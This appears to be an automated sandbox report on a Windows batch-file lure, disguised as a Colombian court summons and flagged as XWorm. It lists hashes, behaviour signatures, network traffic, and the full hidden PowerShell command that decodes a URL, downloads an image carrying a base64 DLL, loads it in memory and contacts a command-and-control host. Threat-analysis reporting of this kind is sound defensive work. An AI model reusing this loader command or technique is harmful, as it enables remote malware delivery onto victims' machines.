Analysis
-
max time kernel
173s -
max time network
180s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-11-2024 20:46
Static task
static1
Behavioral task
behavioral1
Sample
En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Por medio de la presente, se le comunica que, en virtud del proceso No. 2024-52100-63561-56165, ejec.exe
Resource
win7-20241023-en
Behavioral task
behavioral4
Sample
Por medio de la presente, se le comunica que, en virtud del proceso No. 2024-52100-63561-56165, ejec.exe
Resource
win10v2004-20241007-en
General
-
Target
En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat
-
Size
210KB
-
MD5
ed413cc9ec12454b62e10a58bb2e4213
-
SHA1
a027ce72c41eb753d1e275eb955ddf8b323a84de
-
SHA256
81fe1c16a0c91c2ce2b997dfa0d6c3ecb03af6a9494024d273b902b2f088ca6e
-
SHA512
7ff5eb191033f5770f180ab3111fe6402cc9ac71540c6a6eda2b32e50a57e5b267a7006ce45f82b8e578962a5a2b7a605eda8cb525430fe889b4d941dd11f9cf
-
SSDEEP
6144:vZ5PFlZSyyiQNfwJIJ9wNfX3T7jVrDjDb7bLw8:B
Malware Config
Extracted
https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/5012-15-0x00000179BB550000-0x00000179BB8E4000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 19 IoCs
flow pid Process 6 5012 powershell.exe 24 5012 powershell.exe 25 5012 powershell.exe 31 5012 powershell.exe 40 5012 powershell.exe 41 5012 powershell.exe 43 5012 powershell.exe 44 5012 powershell.exe 45 5012 powershell.exe 50 5012 powershell.exe 51 5012 powershell.exe 52 5012 powershell.exe 53 5012 powershell.exe 55 5012 powershell.exe 56 5012 powershell.exe 57 5012 powershell.exe 58 5012 powershell.exe 59 5012 powershell.exe 60 5012 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5012 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5012 powershell.exe 5012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5012 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4680 wrote to memory of 5012 4680 cmd.exe 85 PID 4680 wrote to memory of 5012 4680 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('barrioantioquia.webredirect.org', '6095');"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
Network
-
Remote address:8.8.8.8:53Request3105.filemail.comIN AResponse3105.filemail.comIN CNAMEip.3105.filemail.comip.3105.filemail.comIN A193.30.119.205
-
GEThttps://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904fpowershell.exeRemote address:193.30.119.205:443RequestGET /api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f HTTP/1.1
Host: 3105.filemail.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 06 Nov 2024 00:04:10 GMT
Accept-Ranges: bytes
ETag: 078712b9591b4fb096f2292adece0898
X-Transfer-ID: ibybhsntnwgamsn
Content-Disposition: attachment; filename=DetahNotwe.jpg
Date: Tue, 12 Nov 2024 20:46:10 GMT
-
Remote address:8.8.8.8:53Request13.86.106.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request205.119.30.193.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request22.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request97.17.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestbarrioantioquia.webredirect.orgIN AResponsebarrioantioquia.webredirect.orgIN A5.79.98.102
-
Remote address:8.8.8.8:53Request212.20.149.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request198.187.3.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request73.190.18.2.in-addr.arpaIN PTRResponse73.190.18.2.in-addr.arpaIN PTRa2-18-190-73deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request22.236.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestbarrioantioquia.webredirect.orgIN AResponsebarrioantioquia.webredirect.orgIN A5.79.98.102
-
193.30.119.205:443https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904ftls, httppowershell.exe112.0kB 5.5MB 2300 3998
HTTP Request
GET https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904fHTTP Response
200 -
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 160 B 5 4
-
260 B 160 B 5 4
-
260 B 160 B 5 4
-
260 B 160 B 5 4
-
260 B 160 B 5 4
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
63 B 96 B 1 1
DNS Request
3105.filemail.com
DNS Response
193.30.119.205
-
71 B 157 B 1 1
DNS Request
13.86.106.20.in-addr.arpa
-
73 B 131 B 1 1
DNS Request
205.119.30.193.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.160.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
97.17.167.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
77 B 93 B 1 1
DNS Request
barrioantioquia.webredirect.org
DNS Response
5.79.98.102
-
72 B 146 B 1 1
DNS Request
212.20.149.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
198.187.3.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
73.190.18.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.236.111.52.in-addr.arpa
-
77 B 93 B 1 1
DNS Request
barrioantioquia.webredirect.org
DNS Response
5.79.98.102
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82